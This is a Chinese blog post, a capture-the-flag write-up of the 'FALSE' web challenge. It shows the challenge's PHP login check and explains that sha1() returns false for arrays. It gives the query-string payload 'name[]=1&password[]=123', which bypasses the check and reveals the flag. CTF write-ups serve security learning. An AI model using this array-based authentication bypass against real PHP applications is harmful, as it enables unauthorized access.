实验吧-FALSE

最新推荐文章于 2020-09-08 09:20:28 发布
最新推荐文章于 2020-09-08 09:20:28 发布
阅读量235 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingchenldl/article/details/84576445
版权

FALSE

原题链接

http://ctf5.shiyanbar.com/web/false.php

分析

<?php
if (isset($_GET['name']) and isset($_GET['password'])) {
    if ($_GET['name'] == $_GET['password'])
        echo '<p>Your password can not be your name!</p>';
    else if (sha1($_GET['name']) === sha1($_GET['password']))
      die('Flag: '.$flag);
    else
        echo '<p>Invalid password.</p>';
}
else{
    echo '<p>Login first!</p>';
?>

注意到源码是三等号,不能用弱类型判断

<?php
    var_dump(sha1('aaroZmOk')===sha1('aaK1STfY'));      //bool(false)
    var_dump(sha1('aaroZmOk')==sha1('aaK1STfY'));       //bool(true)
?>

应该利用false===false

md5 和 sha1 无法处理数组,但是 php 没有抛出异常,直接返回 fasle

sha1([]) === false
md5([]) === false

payload

?name[]=1&password[]=123

flag

CTF{t3st_th3_Sha1}

知识点

md5,sha1不能处理数组,抛出false

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实验报告-实验102
08-03
接着,我们逐个比较队列和栈中弹出的字符,只要发现不匹配,就立即设置结果为false并结束循环。最后,如果整个过程都没有发现不匹配,那么字符串就是回文,输出结果为true。 2. 二叉树的实现及操作: 实验的第二个...
C++实验报告实验七-运算符重载
最新发布
03-14
### C++实验报告实验七-运算符重载 #### 实验目的 本次实验的主要目标是通过实际编程加深对C++中运算符重载的理解和应用。具体包括: 1. **编写程序熟悉运算符重载函数的定义和使用**:通过实践操作理解如何...
实验吧-false writeup
qq_24966613的博客
11-26 632
<?php if (isset($_GET['name']) and isset($_GET['password'])) { if ($_GET['name'] == $_GET['password']) echo '<p>Your password can not be your name!</p>'; else if (sha1($_GET['name']) ==
决斗场 - 实验吧 WEB FALSE
RaAlGhul的博客
01-07 677
题目链接:http://www.shiyanbar.com/ctf/1787
实验吧-web-FALSE
a3uRa的一个窝
08-10 336
&lt;?php if (isset($_GET['name']) and isset($_GET['password'])) { if ($_GET['name'] == $_GET['password']) echo '&lt;p&gt;Your password can not be your name!&lt;/p&gt;'; else if (sha1(...
拐弯抹角&FALSE-实验
Xi4or0uji
05-17 968
最近事是真的多,之前做的题的wp到了现在才写,咸鱼了.............拐弯抹角这道题进去就看见源码,没错了,就是代码审计啊啊啊啊啊题不难,但是确实有学习意义,就贴一贴 &lt;?php // code by SEC@USTC echo '&lt;html&gt;&lt;head&gt;&lt;meta http-equiv="charset" content="gbk"&gt;&lt;/...
《数据结构与算法》-李春葆 实验报告-单链表
12-20
判断是否为空操作是通过 ListEmpty 函数实现的,该函数返回 true 如果单链表为空,否则返回 false。取值操作是通过 GetElem 函数实现的,该函数返回单链表中的第 i 个元素的值。插入操作是通过 ListInsert 函数实现...
实验5 - 副本.docx
05-05
实验5包含了多个编程相关的知识点,主要涉及Python语言的基础和进阶操作。以下是对各个部分的详细解释: 1. **判断奇偶**: 这段代码用于检查输入的整数是否为奇数或偶数。它定义了一个函数`f(x)`,通过检查`x`...
数据结构实验报告-----trie树
06-05
1. **初始化**:创建一个空的Trie树,通常由一个根节点组成,根节点没有父节点,所有子节点的计数器count初始为0,存在标志exist默认为false,且所有子节点为NULL。 2. **插入元素**:`InsertTrieNode`函数负责在...
FALSE——实验
weixin_33810006的博客
06-08 95
今天有时间就多写几篇解题思路吧, 希望能够帮助到那些需要帮助的人, 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! 永远爱你们的————新宝宝 FALSE分值:10 来源:iFurySt 难度:易 参与人数:6232人 Get Flag:3137人 答题人数:3164人 解题通过率...
实验吧-因缺思汀的绕过
一个安全研究员
07-21 499
如题
认真一点!-实验
Xi4or0uji
06-05 3073
这个题其实是个布尔盲注题,怎么说,正常是you are in,报错是you are not in,触发waf是sql injection detected然后fuzz一下,图我就不贴了,做的时候忘了截下图结果大概是过滤了and,空格,逗号,union,+这里有个坑,fuzz的时候or是可以用的,但是尝试id = 1'/**/or/**/'1'='1的时候报you are not in,不应该啊试了...
实验吧-忘记密码了
苟有恒,必有三更眠,五更起。
08-07 254
忘记密码了 原题链接 http://ctf5.shiyanbar.com/10/upload/step1.php 分析 注册,发现有content,直接填 查看了一下源码,发现好像还有东西: &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;meta charset="utf-8" /&gt; ...
shal()函数绕过和session验证绕过
giun的博客
04-18 2771
一、shal()函数绕过 <?php $flag = "flag"; if (isset($_GET['name']) and isset($_GET['password'])) { if ($_GET['name'] == $_GET['password']) echo '<p>Your password can not be your name!...
PHP sha1() md5()函数漏洞
热门推荐
03-09 1万+
1.Prudential   I don‘t think that sha1 is broken. Prove me wrong. 代码如下: [php] view plaincopyprint?           level1       'stylesheet' href='style.css' type='text/
CTF入门_sha1
m0_46203901的博客
09-08 1558
sha1的相等,非对称加密
Bugku-代码审计(数字验证正则绕过)
weixin_33881140的博客
05-31 831
各位小伙伴,我把Bugku上面的关于代码审计类型的WP为两部分,主要是为了各位小伙伴的阅读质量 希望你们能够多多包涵哦!!!! 7: 解题思路:首先应该了解一个关于php弱类型的知识: 再继续阅读信息就会发现:、 第一处if ($_GET['name'] == $_GET['password'])判断时两数组确实是不同的, 但在第二处...
PHP基本语法与弱类型的知识总结
Ljt101222的博客
09-17 438
这一周自己学习了PHP的基本语法和对PHP弱类型进行总结,下边就是我的分享。 一、PHP的基本语法       PHP的基本语法,我自己主要是在 http://www.w3school.com.cn/php/index.asp  这个网站上学习的,里边介绍的非常详细。如果没有PHP基础的,可以去那个网站上学习。我主要是介绍PHP弱类型,以及对PHP弱类型的总结。 二、PHP弱类型的总结  ...
判断字符类型 实验8-11
05-26
这些函数都是字符串对象自带的方法,如果输入的字符满足对应的条件,就会返回 `True`,否则返回 `False`。最后,我们根据不同的情况输出对应的提示信息。 需要注意的是,这个程序只能处理单个字符的情况,如果用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值